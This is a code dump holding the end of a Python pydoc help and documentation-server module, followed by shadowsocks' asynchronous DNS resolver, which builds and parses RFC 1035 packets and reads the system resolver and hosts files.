self.output = self._output or sys.stdout
#fix me brython
#input = property(lambda self: self._input or sys.stdin)
#output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in ['True', 'False', 'None']:
# special case these keywords since they are objects too
doc(eval(request), 'Help on %s:')
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the interactive help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
        items = sorted(items)
colw = width // columns
rows = (len(items) + columns - 1) // columns
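        # Editorial note (not in the original source): the layout below is
        # column-major -- index col * rows + row walks down each column
        # first, so with 6 items in 4 columns (rows == 2) the first printed
        # row is items[0], items[2], items[4].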
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import formatter
buffer = io.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + ', '.join(xrefs.split()) + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''' , '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
try:
loader = importer.find_module(modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except Exception:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
try:
module = loader.load_module(modname)
except ImportError:
if onerror:
onerror(modname)
continue
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', '%s; charset=UTF-8' % content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
            self.host = '127.0.0.1' if sys.platform == 'mac' else 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the _pydoc.css style
    sheet is read and returned if it exists.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
css_path = "pydoc_data/_pydoc.css"
css_link = (
'<link rel="stylesheet" type="text/css" href="%s">' %
css_path)
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Pydoc: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>
</body></html>''' % (title, css_link, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p align=right><font color="#909090" face="helvetica,'
'arial"><strong>pydoc</strong> by Ka-Ping Yee'
            '&lt;ping@lfw.org&gt;</font>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading(
'<big><big><strong>Search Results</strong></big></big>',
'#ffffff', '#7799ee')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection(
'key = %s' % key, '#ffffff', '#ee77aa', '<br>'.join(results))
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with tokenize.open(path) as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading(
'<big><big><strong>File Listing</strong></big></big>',
'#ffffff', '#7799ee')
contents = heading + html.bigsection(
'File: %s' % path, '#ffffff', '#ee77aa', body)
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Topics', '#ffffff', '#ee77aa', contents)
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Keywords', '#ffffff', '#ee77aa', contents)
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'KEYWORD'
else:
title = 'TOPIC'
heading = html.heading(
'<big><big><strong>%s</strong></big></big>' % title,
'#ffffff', '#7799ee')
contents = '<pre>%s</pre>' % html.markup(contents)
        contents = html.bigsection(topic, '#ffffff', '#ee77aa', contents)
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.section('Related help topics: ',
'#ffffff', '#ee77aa', xrefs)
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading(
'<big><big><strong>Error</strong></big></big>',
'#ffffff', '#7799ee')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, '#ffffff', '#bb0000',
contents)
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if content_type == 'text/css':
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, url)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and x.find(os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bk:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
if start_server:
if port is None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
|
wshenx/shadowsocks
|
refs/heads/master
|
shadowsocks/asyncdns.py
|
655
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import socket
import struct
import re
import logging
from shadowsocks import common, lru_cache, eventloop, shell
CACHE_SWEEP_INTERVAL = 30
VALID_HOSTNAME = re.compile(br"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
common.patch_socket()
# rfc1035
# format
# +---------------------+
# | Header |
# +---------------------+
# | Question | the question for the name server
# +---------------------+
# | Answer | RRs answering the question
# +---------------------+
# | Authority | RRs pointing toward an authority
# +---------------------+
# | Additional | RRs holding additional information
# +---------------------+
#
# header
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ID |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | QDCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ANCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | NSCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ARCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
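#
# Worked example (editorial, not part of the original module): build_request()
# below packs this header with struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0), so
# the two flag bytes are 0x01 0x00 -- QR=0 (query), Opcode=0, AA=0, TC=0,
# RD=1 (recursion desired) -- followed by QDCOUNT=1 and zeroed ANCOUNT,
# NSCOUNT and ARCOUNT. The random 16-bit ID from os.urandom(2) is prepended
# separately.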
QTYPE_ANY = 255
QTYPE_A = 1
QTYPE_AAAA = 28
QTYPE_CNAME = 5
QTYPE_NS = 2
QCLASS_IN = 1
def build_address(address):
address = address.strip(b'.')
labels = address.split(b'.')
results = []
for label in labels:
l = len(label)
if l > 63:
return None
results.append(common.chr(l))
results.append(label)
results.append(b'\0')
return b''.join(results)
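# Illustration (editorial, standard RFC 1035 label encoding):
# build_address(b'example.com') returns b'\x07example\x03com\x00' -- each
# label is prefixed with its length and the name is terminated by a zero byte.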
def build_request(address, qtype):
request_id = os.urandom(2)
header = struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)
addr = build_address(address)
qtype_qclass = struct.pack('!HH', qtype, QCLASS_IN)
return request_id + header + addr + qtype_qclass
def parse_ip(addrtype, data, length, offset):
if addrtype == QTYPE_A:
return socket.inet_ntop(socket.AF_INET, data[offset:offset + length])
elif addrtype == QTYPE_AAAA:
return socket.inet_ntop(socket.AF_INET6, data[offset:offset + length])
elif addrtype in [QTYPE_CNAME, QTYPE_NS]:
return parse_name(data, offset)[1]
else:
return data[offset:offset + length]
def parse_name(data, offset):
p = offset
labels = []
l = common.ord(data[p])
while l > 0:
if (l & (128 + 64)) == (128 + 64):
# pointer
pointer = struct.unpack('!H', data[p:p + 2])[0]
pointer &= 0x3FFF
r = parse_name(data, pointer)
labels.append(r[1])
p += 2
# pointer is the end
return p - offset, b'.'.join(labels)
else:
labels.append(data[p + 1:p + 1 + l])
p += 1 + l
l = common.ord(data[p])
return p - offset + 1, b'.'.join(labels)
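# Editorial note: the (l & 0xC0) == 0xC0 branch above implements RFC 1035
# message compression. A 2-byte field whose top two bits are both set is a
# pointer, and the low 14 bits (masked with 0x3FFF) give the offset of the
# remainder of the name elsewhere in the packet.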
# rfc1035
# record
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | |
# / /
# / NAME /
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TYPE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | CLASS |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TTL |
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | RDLENGTH |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
# / RDATA /
# / /
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
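# Reading guide (editorial): parse_record() below consumes NAME via
# parse_name(), unpacks TYPE/CLASS/TTL/RDLENGTH with struct format '!HHiH'
# (10 bytes), then hands RDATA -- the RDLENGTH bytes that follow -- to
# parse_ip().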
def parse_record(data, offset, question=False):
nlen, name = parse_name(data, offset)
if not question:
record_type, record_class, record_ttl, record_rdlength = struct.unpack(
'!HHiH', data[offset + nlen:offset + nlen + 10]
)
ip = parse_ip(record_type, data, record_rdlength, offset + nlen + 10)
return nlen + 10 + record_rdlength, \
(name, ip, record_type, record_class, record_ttl)
else:
record_type, record_class = struct.unpack(
'!HH', data[offset + nlen:offset + nlen + 4]
)
        # mirror the answer tuple shape; questions carry no IP or TTL
        return nlen + 4, (name, None, record_type, record_class, None)
def parse_header(data):
if len(data) >= 12:
header = struct.unpack('!HBBHHHH', data[:12])
res_id = header[0]
res_qr = header[1] & 128
res_tc = header[1] & 2
res_ra = header[2] & 128
res_rcode = header[2] & 15
# assert res_tc == 0
# assert res_rcode in [0, 3]
res_qdcount = header[3]
res_ancount = header[4]
res_nscount = header[5]
res_arcount = header[6]
return (res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount,
res_ancount, res_nscount, res_arcount)
return None
def parse_response(data):
try:
if len(data) >= 12:
header = parse_header(data)
if not header:
return None
res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount, \
res_ancount, res_nscount, res_arcount = header
qds = []
ans = []
offset = 12
for i in range(0, res_qdcount):
l, r = parse_record(data, offset, True)
offset += l
if r:
qds.append(r)
for i in range(0, res_ancount):
l, r = parse_record(data, offset)
offset += l
if r:
ans.append(r)
for i in range(0, res_nscount):
l, r = parse_record(data, offset)
offset += l
for i in range(0, res_arcount):
l, r = parse_record(data, offset)
offset += l
response = DNSResponse()
if qds:
response.hostname = qds[0][0]
for an in qds:
response.questions.append((an[1], an[2], an[3]))
for an in ans:
response.answers.append((an[1], an[2], an[3]))
return response
except Exception as e:
shell.print_exception(e)
return None
def is_valid_hostname(hostname):
if len(hostname) > 255:
return False
    if hostname.endswith(b'.'):  # endswith works on Python 2 and 3; indexing bytes yields an int on 3
hostname = hostname[:-1]
return all(VALID_HOSTNAME.match(x) for x in hostname.split(b'.'))
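# Illustration (editorial): is_valid_hostname(b'example.com') is True, while
# a label longer than 63 characters or one that starts or ends with '-' fails
# the VALID_HOSTNAME regex, and any name over 255 bytes is rejected outright.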
class DNSResponse(object):
def __init__(self):
self.hostname = None
self.questions = [] # each: (addr, type, class)
self.answers = [] # each: (addr, type, class)
def __str__(self):
return '%s: %s' % (self.hostname, str(self.answers))
STATUS_IPV4 = 0
STATUS_IPV6 = 1
class DNSResolver(object):
def __init__(self, server_list=None):
self._loop = None
self._hosts = {}
self._hostname_status = {}
self._hostname_to_cb = {}
self._cb_to_hostname = {}
self._cache = lru_cache.LRUCache(timeout=300)
self._sock = None
if server_list is None:
self._servers = None
self._parse_resolv()
else:
self._servers = server_list
self._parse_hosts()
# TODO monitor hosts change and reload hosts
# TODO parse /etc/gai.conf and follow its rules
def _parse_resolv(self):
self._servers = []
try:
with open('/etc/resolv.conf', 'rb') as f:
content = f.readlines()
for line in content:
line = line.strip()
if line:
if line.startswith(b'nameserver'):
parts = line.split()
if len(parts) >= 2:
server = parts[1]
if common.is_ip(server) == socket.AF_INET:
if type(server) != str:
server = server.decode('utf8')
self._servers.append(server)
except IOError:
pass
if not self._servers:
self._servers = ['8.8.4.4', '8.8.8.8']
def _parse_hosts(self):
etc_path = '/etc/hosts'
if 'WINDIR' in os.environ:
etc_path = os.environ['WINDIR'] + '/system32/drivers/etc/hosts'
try:
with open(etc_path, 'rb') as f:
for line in f.readlines():
line = line.strip()
parts = line.split()
if len(parts) >= 2:
ip = parts[0]
if common.is_ip(ip):
for i in range(1, len(parts)):
hostname = parts[i]
if hostname:
self._hosts[hostname] = ip
except IOError:
self._hosts['localhost'] = '127.0.0.1'
def add_to_loop(self, loop):
if self._loop:
            raise Exception('already added to loop')
self._loop = loop
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
loop.add(self._sock, eventloop.POLL_IN, self)
loop.add_periodic(self.handle_periodic)
def _call_callback(self, hostname, ip, error=None):
callbacks = self._hostname_to_cb.get(hostname, [])
for callback in callbacks:
if callback in self._cb_to_hostname:
del self._cb_to_hostname[callback]
if ip or error:
callback((hostname, ip), error)
else:
callback((hostname, None),
Exception('unknown hostname %s' % hostname))
if hostname in self._hostname_to_cb:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _handle_data(self, data):
response = parse_response(data)
if response and response.hostname:
hostname = response.hostname
ip = None
for answer in response.answers:
if answer[1] in (QTYPE_A, QTYPE_AAAA) and \
answer[2] == QCLASS_IN:
ip = answer[0]
break
if not ip and self._hostname_status.get(hostname, STATUS_IPV6) \
== STATUS_IPV4:
self._hostname_status[hostname] = STATUS_IPV6
self._send_req(hostname, QTYPE_AAAA)
else:
if ip:
self._cache[hostname] = ip
self._call_callback(hostname, ip)
elif self._hostname_status.get(hostname, None) == STATUS_IPV6:
for question in response.questions:
if question[1] == QTYPE_AAAA:
self._call_callback(hostname, None)
break
def handle_event(self, sock, fd, event):
if sock != self._sock:
return
if event & eventloop.POLL_ERR:
logging.error('dns socket err')
self._loop.remove(self._sock)
self._sock.close()
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
self._loop.add(self._sock, eventloop.POLL_IN, self)
else:
data, addr = sock.recvfrom(1024)
if addr[0] not in self._servers:
                logging.warning('received a packet from an address other than our dns servers')
return
self._handle_data(data)
def handle_periodic(self):
self._cache.sweep()
def remove_callback(self, callback):
hostname = self._cb_to_hostname.get(callback)
if hostname:
del self._cb_to_hostname[callback]
arr = self._hostname_to_cb.get(hostname, None)
if arr:
arr.remove(callback)
if not arr:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _send_req(self, hostname, qtype):
req = build_request(hostname, qtype)
for server in self._servers:
logging.debug('resolving %s with type %d using server %s',
hostname, qtype, server)
self._sock.sendto(req, (server, 53))
